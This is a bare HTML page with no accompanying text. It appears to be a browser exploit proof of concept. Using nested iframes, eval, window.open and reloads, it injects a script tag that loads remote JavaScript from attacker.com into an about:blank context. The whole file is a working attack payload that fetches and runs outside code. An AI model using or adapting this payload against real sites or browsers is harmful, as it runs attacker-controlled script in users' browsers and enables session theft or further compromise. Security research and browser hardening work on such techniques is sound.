<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGzuOOzGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGzuOOzGGGGG.onload=_=>GGGGGzuOOzGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGzuOOzGGG src=about:blank><\/iframe><script>GGGzuOOzGGG.onload=_=>GGGzuOOzGGG.contentDocument.body.innerHTML+=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;GGGzuOOzGGG.contentWindow.location.reload();<\/script>');");GGGGGzuOOzGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>